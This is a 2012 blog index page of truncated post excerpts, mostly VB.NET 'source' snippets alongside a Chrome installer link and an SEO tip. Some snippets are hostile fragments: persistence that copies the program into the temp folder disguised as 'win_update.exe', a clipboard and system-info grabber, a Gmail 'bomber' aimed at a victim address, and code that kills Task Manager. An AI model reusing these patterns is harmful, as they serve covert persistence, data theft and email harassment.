Friday, 20 July 2012

Google Chrome Offline installer (20.0.1132.57 Stable)

Google Chrome is a browser that combines a minimal design with sophisticated technology to make the web faster, safer, and easier.Use one box for everything--type in the address bar and get suggestions for both search and Web pages. Thumbnails of your top sites let you access your favorite pages instantly with lightning speed from any new tab...

Read more »

Friday, 20 July 2012 by Phinuss · 0

Friday, 27 January 2012

This is a pretty easy way to get your site indexed in Google fast and get a high PR link at the same time. Step 1: Go To : bloggerschoiceawards.com And register an account. Step 2: Once your account is ready click on nominate and submit your site to the proper category. When you are done you will notice that your site will appear on the front page of bloggerschoiceawards.com under “Most Recent Nominationsâ€. Now when you...

Friday, 27 January 2012 by Phinuss · 0

Saturday, 7 January 2012

[Source]Add Your Application To Startup

Before Public Class Form1 Add: Imports System.IO Imports Microsoft.Win32 Now double click form1 and add the following Code: Try If System.IO.File.Exists(Path.GetTempPath() & "win_update.exe") = False Then System.IO.File.Copy(System.Reflection.Assembly. _ GetExecutingAssembly.Location, Path.GetTempPath() & "win_update.exe") End...

Saturday, 7 January 2012 by Phinuss · 0

[Source] Infor Grabber

Gets OS Name: Textbox1.text = My.Computer.Info.OSFullName Gets OS Version & Build Number: Textbox2.text = My.Computer.Info.OSVersion Gets Total Physical Memory: Textbox3.text = My.Computer.Info.TotalPhysicalMemory Gets Available Physical Memory: Textbox4.text = My.Computer.Info.AvailablePhysicalMemory Gets Clipboard Text: Textbox5.text...

by Phinuss · 0

[SOURCE] GMAIL Bomber

Add a Timer, 5 textboxes, button textbox1 = Gmail Username textbox2 = Gmail Password textbox3 = Victim E-mail Address textbox4 = Subject textbox5 = Message button1.text = send! Add on Top Of "Public Class Form1" Imports System.Net.Mail Double Click Button1 and write: timer1.start then Double click Timer1 and write: Dim MyMailMessage...

by Phinuss · 0

[VB.NET] Usefull Source Codes

Open a Website: Process.Start("www.bumpbox.net") Process.Start("www.myforum.net") Open something Shell("Notepad") Shell("Calculator") Delete a file Dim FileToDelete As String FileToDelete = "C:\File.exe" If System.IO.File.Exists(FileToDelete) = True Then System.IO.File.Delete(FileToDelete) Kill a process Dim RunningProcess As System.Diagnostics.Process = Process.GetProcessesByName("taskmgr.exe")(0) RunningProcess.Kill() Rename...

by Phinuss · 0

[Source] Run multiple Skype accounts

Imports System.IO 'neil here, video of compile will be hosted on ' my youtube www.youtube.com/5050neil Public Class Form1 Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click Dim openFileDialog1 As New OpenFileDialog openFileDialog1.Title = "neil/hotxx Open File" ...

by Phinuss · 0

All Rights Reserved Mbojo-Lab | Blogger Template by Bloggermint